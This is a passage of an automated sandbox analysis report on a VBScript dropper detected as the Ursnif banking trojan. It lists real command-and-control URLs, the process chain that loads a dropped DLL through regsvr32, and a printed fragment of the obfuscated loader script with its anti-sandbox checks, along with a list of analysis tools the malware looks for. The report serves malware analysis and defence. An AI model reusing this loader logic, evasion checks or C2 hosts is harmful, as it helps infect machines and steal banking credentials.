            Source: msapplication.xml7.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x168b1feb,0x01d64c07</date><accdate>0x168b1feb,0x01d64c07</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x168b1feb,0x01d64c07</date><accdate>0x168da774,0x01d64c07</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: iplogger.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jun 2020 22:13:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
            Source: wscript.exe, 00000000.00000002.484198407.000001AF715DC000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: regsvr32.exe, 00000005.00000003.1703639487.00000000010E9000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.1409923807.00000000010CF000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/
            Source: regsvr32.exe, 00000005.00000003.1996911234.00000000010E9000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/43
            Source: regsvr32.exe, 00000005.00000003.1409802049.00000000010EB000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/6
            Source: regsvr32.exe, 00000005.00000003.1336310749.00000000010CF000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/6D
            Source: regsvr32.exe, 00000005.00000003.1556951150.00000000010EB000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/8
            Source: regsvr32.exe, 00000005.00000003.1630316981.00000000010CF000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2148791952.0000000001080000.00000004.00000020.sdmpString found in binary or memory: http://cdn.arsis.at/D
            Source: regsvr32.exe, 00000005.00000003.1797371172.00000000010E9000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/T
            Source: regsvr32.exe, 00000005.00000003.1484041913.000000000110B000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/DJ2eFEKZq8U1lqR/jnLxdpvy51PH6egcCU/PxGNe1PTx/6VSQ7fd_2FKiMlsO5XFz/sDQpWNzmv
            Source: regsvr32.exe, 00000005.00000003.1703639487.00000000010E9000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/HZN0oiBpETLMs1/04ZwqrTlF2fiYUjJgUB7b/aXddKpKd7SogQKI0/f9Kg1_2FaZA46nk/y24wB
            Source: regsvr32.exe, 00000005.00000003.2002010817.00000000010E9000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/TYj_2FO_2/BU8kshK5XeYQxND6w_2B/jLmQETo2668oAj2dmC9/YBPu9aAHCztoZXswZm0lBg/6
            Source: regsvr32.exe, 00000005.00000003.2069975539.00000000010EB000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/VUc8DYHbTd/nxhSvhN_2BaqluyCR/yfgw0tuiJI_2/BCBTjHmGW3W/UUBVj78yPgrw9z/2II2J1
            Source: regsvr32.exe, 00000005.00000003.1336178442.00000000010EB000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/hpOzlRBOkEC27Z0j_2F/yPpp5RyE9Oknv8tQCuASeH/trIy518RQtUv_/2Bm4JbFO/Rd35PF8E_
            Source: regsvr32.exe, 00000005.00000003.1188693281.00000000010EB000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/lwuPdaPTuR8eBoC4/vShoRm2q4eT6Z_2/FektbbX6qERojD5NoC/2mLIdLmoY/oe6KE72ImARbZ
            Source: regsvr32.exe, 00000005.00000003.1797371172.00000000010E9000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/nJP22pCdr/onbL4xTCAKdpOCZd67XZ/zeOWNEBCaVEDnuXDqyy/gKOpKX5US0b_2F8AZso0n8/i
            Source: regsvr32.exe, 00000005.00000002.2149062990.00000000010E9000.00000004.00000020.sdmpString found in binary or memory: http://cdn.arsis.at/api1/oa2e_2BE33qN2CXW/pY3NQ0ERzVODRWs/mGF_2Bh_2FQ8UAs_2B/dmXEgMeDj/YIhhtR2FvaZsU
            Source: regsvr32.exe, 00000005.00000003.1776875566.000000000110B000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/pMBjT60J3QzW/2S7BpnCRJGv/_2BCJz1WD6LvVO/UYuC86ONCTcRMSPsRQ1V5/rn4oIkAX1j9ku
            Source: regsvr32.exe, 00000005.00000003.1899631536.00000000010E9000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/pdyEn910Mk_2/FlHr99fDD7T/WHdO77PE1muwJ0/8kfHrIZPdGcT4oog1UBSr/AqzVHXjqi4NvF
            Source: regsvr32.exe, 00000005.00000003.1263154295.00000000010E9000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/cc
            Source: regsvr32.exe, 00000005.00000003.1630316981.00000000010CF000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/d
            Source: regsvr32.exe, 00000005.00000003.1703639487.00000000010E9000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at:80
            Source: regsvr32.exe, 00000005.00000003.2104651102.00000000010EB000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at:80C
            Source: regsvr32.exe, 00000005.00000003.1703639487.00000000010E9000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at:80Loopback
            Source: regsvr32.exe, 00000005.00000003.1703639487.00000000010E9000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at:80k_0
            Source: wscript.exe, 00000000.00000002.484198407.000001AF715DC000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
            Source: wscript.exe, 00000000.00000002.484198407.000001AF715DC000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: wscript.exe, 00000000.00000002.484198407.000001AF715DC000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: wscript.exe, 00000000.00000002.484198407.000001AF715DC000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: wscript.exe, 00000000.00000002.484198407.000001AF715DC000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
            Source: wscript.exe, 00000000.00000002.484198407.000001AF715DC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
            Source: msapplication.xml.10.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.10.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.10.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.10.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.10.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.10.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.10.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.10.drString found in binary or memory: http://www.youtube.com/
            Source: wscript.exe, 00000000.00000003.462565629.000001AF714C5000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/
            Source: wscript.exe, 00000000.00000003.440157325.000001AF6FB56000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bD467
            Source: wscript.exe, 00000000.00000003.440157325.000001AF6FB56000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.462565629.000001AF714C5000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.471330423.000001AF7056D000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.475499272.000001AF6FB7D000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.463118640.000001AF714A4000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bP467
            Source: wscript.exe, 00000000.00000003.472422088.000001AF74540000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bP467Y
            Source: wscript.exe, 00000000.00000002.483960277.000001AF7157A000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/Z
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731198463.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730980508.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731140018.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731043829.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1096, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731198463.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730980508.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731140018.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731043829.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1096, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_736F15F3 NtMapViewOfSection,5_2_736F15F3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_736F18DB GetProcAddress,NtCreateSection,memset,5_2_736F18DB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_736F2775 NtQueryVirtualMemory,5_2_736F2775
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_01183A67 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_01183A67
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0118AEB5 NtQueryVirtualMemory,5_2_0118AEB5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_736F25545_2_736F2554
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_011815D65_2_011815D6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0118AC945_2_0118AC94
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_737046105_2_73704610
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_73708A885_2_73708A88
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\afterbirth.rs A749960A8CB6111201C02A03DD751A289D193F19E53D8B43AE82F9654B654C4C
            Source: presentation#_37412.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: classification engineClassification label: mal100.bank.troj.evad.winVBS@16/19@20/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation#_37412.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: presentation#_37412.vbsVirustotal: Detection: 31%
            Source: presentation#_37412.vbsReversingLabs: Detection: 23%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation#_37412.vbs'
            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\afterbirth.rs
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\afterbirth.rs
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3436 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1668 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3236 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3868 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\afterbirth.rsJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3436 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1668 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3236 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3868 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
            Source: Binary string: c:\end\dress\Poem\little\Meet\Farm\Part\Neighbor.pdb source: wscript.exe, 00000000.00000003.458283750.000001AF6FA83000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2152633056.000000007370A000.00000002.00020000.sdmp, afterbirth.rs.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, "TESTING") > 0) Then' Eben Phillip mimesis Boris manpower. nation ague chinch huh oppressor Mohammedan pollock narcotic. Sam circlet Carpathia change kneel mestizo pentecostal, inflexible schoolmarm actinide Noetherian Ortega, pinxter Exit FunctionEnd Ifprincipal("https://iplogger.org/1bP467")' similitude ergative is675 lobar latitudinal hereafter Laguerre ridicule. covariant59 fruitful gristmill Paso trend hypothetic. 1934820 padre downpour Gutenberg. litmus veracity indigent Stuttgart staunch Rudy chicken whir thrombosis somber zesty impossible pry southpaw dose Susie648 melancholy Set eyelidService = GetObject("winmgmts:Win32_Process")REM Yale massif, 9952976 hyperboloidal thereto hostelry yourselves octillion eyelidService.Create "regsvr32" + " -s " + JPi + "afterbirth.rs" + ""pestleEnd FunctionFunction CL()on error resume nextIf (InStr(WScript.ScriptName, cStr(929457146)) > 0 And rapport = 0) ThenExit FunctionEnd Ifannuli549 = ((79 + (79 + (-(72 + (-8.0))))) + (-91.0))annuli549_download = (((38 + 6156.0) - (81 + 6057.0)) + (-53.0))If CreateObject("Scripting.FileSystemObject").GetFolder(JPi).Files.Count < annuli549 ThenQnEnd IfSet oEJa = CreateObject("WScript.Shell")protest = oEJa.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"If CreateObject("Scripting.FileSystemObject").GetFolder(protest).Files.Count < annuli549_download ThenQnEnd IfREM bolivar accommodate feckless coronary math Dow coauthor reliquary. Payne, Angelina enterprise. tung parkish Arrhenius warhead innumerable. argumentative hydroxide, highwayman oases forfend ricotta Cuba743 littermate BMW stationery silicate End FunctionFunction penumbral473()' dragging could flocculate frothy injunct cutset agribusiness spectrum, bassoon Winnipeg, Agamemnon Triassic cobweb conduct subsume. 3338206 occupant on error resume nextIf (InStr(WScript.ScriptName, cStr(929457146)) > 0 And rapport = 0) ThenExit Function' peal chlorate asteria hairspring transconductance mulberry privy chilblain injudicious bade archbishop ethereal Skippy windsurf mild quern79, blackbird mutton Taurus bullock luscious steeplechase veil compellable acupuncture stronghold whelm rapier Genevieve End IfSet eyelidService = GetObject("winmgmts:\\.\root\cimv2")REM vignette upstart Gresham viper, whose everlasting. snoopy, 4095978 cranium Imbrium. bossy, 9000185 Laocoon prostitute flaw scatterbrain, gibbet concise mobility publication Harvard statuesque Set whetherlItems = eyelidService.ExecQuery("Select * from Win32_ComputerSystem")For Each liy In whetherlItemsREM Hurd. diagnose, 2758521 bubble shagging Vicksburg allege rust fact. jubilant duct chicanery summer voiceband WkJ = WkJ + Int((liy.TotalPhysicalMemory) / (1048578 - (40 + (-((45 + (-28.0)) + 21.0)))))NextIf WkJ < (((264 - 215.0) + (1149 - 69.0)) - 99.0) Then' eclipse ditty chapter Gestapo graveyard Angola Dutch solecism line Chinese Wilhelmina Bach reconnaissance Harold colorate horrendous, 542178 ineradicable condensate Fayette in
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_736F2543 push ecx; ret 5_2_736F2553
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_736F24F0 push ecx; ret 5_2_736F24F9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0118ED26 pushfd ; retf 5_2_0118ED36
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0118A950 push ecx; ret 5_2_0118A959
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0118AC83 push ecx; ret 5_2_0118AC93
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_73704FBD push dword ptr [esp+ecx-75h]; iretd 5_2_73704FC1
            Source: initial sampleStatic PE information: section name: .text entropy: 6.8378665447

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\afterbirth.rsJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\afterbirth.rsJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731198463.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730980508.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731140018.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731043829.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1096, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\presentation#_37412.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: SYSER.EXE=
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
